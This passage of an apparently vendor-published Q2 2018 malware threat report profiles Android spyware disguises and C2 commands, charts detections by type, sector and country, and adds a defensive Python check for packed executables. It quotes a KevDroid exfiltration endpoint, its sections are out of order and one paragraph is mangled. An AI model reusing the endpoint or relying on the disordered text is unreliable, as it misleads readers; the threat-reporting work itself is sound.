• Enable and disable a Wi-Fi connection
• Access a location specified by the attackers
• Make recordings
• Make calls

4.1.5 Stalker Spy

The next malware in our list is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy, MBackup

HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service

Mobile Spy

随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z

CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a “007 license”.

Version 1: Adobe Flash Player

Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:

• Send_SMS - extract SMS content and send it to the C&C server
• Send_USSD - send the USSD to the C&C server
• Gethistory - monitor browser history
• Start_AllApp - gather info about installed applications
• Send_call - set the Intent action to call
• Forward_call - forward incoming calls
• ResForward_call - reset call forwarding
• Go_Smsmnd - delete SMS content
• Go_GetAlls - get SMS history
• Dell_sms - delete SMS content in a conversation
• Send_spam - send spam SMS
• Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot:

佐川急便, 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

• contacts - Get contact details and email ID
• Mute - Set action to mute
• Mms - Get MMS content
• info - Get device information

4.1.8 RedAlert

RedAlert changes multiple “spy legends” to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber

Version 2: Update Google Market, Flash Player, Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

• depostbankfinanzassistent
• plmbank
• aibibankandroid

The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1:

CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس, تلگرام ھمھ کاره

Proxy, دوست یاب, Telegram Ton

شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like “app can't be run”. But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1:

Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot

Reccoder-Call, QRCodeBar Scanner APK

Let me love you ringtone, Iphone Ringtone, Night light

Beauty camera-Photo editor, Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a “skip option”. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises named above.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which upgrades its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.

Version-1: Netflix Hack, Instagram Hack

Version-2: TSF Launcher

Version-3: Android Service, PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via… another cryptominer named CoinMiner.

How is that possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim. Thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May

4.2.3 June 2018

Android-targeted malware in June

5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial-of-service. For this Q2 2018 Report, we place Worms in a special category called “Strategic Threat” due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A “Net Worm” typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a “multi-threaded polymorphic” worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or “peers”) that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a “memory resident” virus that infects “exe” and “scr” files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an “IM” or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom (“gb” for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that “infects” other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a “severe” virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware

In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo

The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.

5.2.4 Exploits

Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (.pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
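As an added example (not code from the Comodo report), the following Python walks the section table of a Windows PE file and reports the indicators an analyst uses to recognise a UPX-style packed image: the default UPX section names, a first section that is empty on disk but large in memory (the stub unpacks the original code into it), and section data whose entropy is close to 8 bits per byte. Because a modified UPX build can rename its sections, the last two checks carry more weight than the first; the two PE images are constructed inside the code, not real samples.

```python
import hashlib
import math
import struct

# Default section names left by a stock UPX build. A modified UPX (MUPX) may rename
# them, so the raw-size and entropy heuristics below do not depend on the names alone.
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or single-valued data, close to 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk the PE section table and return one dict per section (name, sizes, entropy)."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # COFF file header (20 bytes)
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)   # SizeOfOptionalHeader
    table = coff + 20 + opt_size                          # section table follows the optional header
    if table + 40 * num_sections > len(pe):
        raise ValueError("section table runs past end of file")
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name, vsize, _vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        data = pe[rawptr:rawptr + rawsize]
        sections.append({
            "name": name.rstrip(b"\0"),
            "virtual_size": vsize,
            "raw_size": rawsize,
            "entropy": shannon_entropy(data),
        })
    return sections


def packer_indicators(pe: bytes) -> list:
    """Return human-readable reasons why the image looks packed (empty list if none)."""
    sections = parse_sections(pe)
    reasons = []
    if {s["name"] for s in sections} & UPX_SECTION_NAMES:
        reasons.append("UPX section names present")
    for s in sections:
        # A section that is empty on disk but large in memory is where a stub unpacks into.
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            reasons.append("section %r is empty on disk but %d bytes in memory (unpack target)"
                           % (s["name"], s["virtual_size"]))
        # Compressed or encrypted code sits near 8 bits/byte; plain x86 code is far lower.
        if s["raw_size"] >= 256 and s["entropy"] > 7.0:
            reasons.append("section %r has entropy %.2f (compressed or encrypted payload)"
                           % (s["name"], s["entropy"]))
    return reasons


def build_sample_pe(section_specs) -> bytes:
    """Constructed test input: a minimal MZ/PE header plus the given (name, virtual_size,
    raw_bytes) sections. Not a runnable binary, just enough structure for the table walk."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine (i386), NumberOfSections, timestamp, symtab ptr, symbol count,
    # SizeOfOptionalHeader (0: omitted here), Characteristics
    coff_header = struct.pack("<HHIIIHH", 0x14C, len(section_specs), 0, 0, 0, 0, 0x102)
    raw_ptr = e_lfanew + 4 + 20 + 40 * len(section_specs)
    table, body = b"", b""
    for name, vsize, raw in section_specs:
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, 0x1000,
                             len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, 0xE0000040)
        raw_ptr += len(raw)
        body += raw
    return dos_header + b"PE\0\0" + coff_header + table + body


# Deterministic stand-in for a compressed payload (constructed, not real malware bytes).
HIGH_ENTROPY_BLOB = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))

# A UPX-style layout: empty UPX0 to unpack into, dense UPX1 holding payload and stub.
SAMPLE_UPX_LIKE = build_sample_pe([
    (b"UPX0", 0x20000, b""),
    (b"UPX1", 0x1000, HIGH_ENTROPY_BLOB),
    (b".rsrc", 0x200, b"\0" * 512),
])

# An ordinary, unpacked layout with low-entropy code and data sections.
SAMPLE_PLAIN = build_sample_pe([
    (b".text", 0x1000, b"\x90" * 2048 + b"\xc3" * 64),
    (b".data", 0x100, b"hello" * 64),
])

if __name__ == "__main__":
    for label, image in (("upx-like", SAMPLE_UPX_LIKE), ("plain", SAMPLE_PLAIN)):
        print(label, packer_indicators(image) or ["no packer indicators"])
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes to `packer_indicators`; treat the result as a triage hint, since legitimate installers and protected commercial software show the same entropy profile.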

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.

NORTH AMERICA
Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531, Tel: +1 (888) 266 6361, Int: +1 (703) 581 6361, Fax: +1 (973) 777 4394, sales@comodo.com

EUROPE
Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA
Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800, www.comodo.co.in

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 All Rights Reserved. Comodo Security Solutions, Inc.

Visit comodo.com

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a new, serious challenge for cybersecurity departments and vendors.

4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks

Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible and constantly change disguises to avoid detection, honing their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It's distributed in three versions:

Version-1: Naver Defender

Version-2: Netease Defender

Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional abilities for spying. It steals account details: contacts, id, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the "AES" algorithm and sends it to the attackers' server: httphttpcgalimcomadminhrpupuphpdo=upload

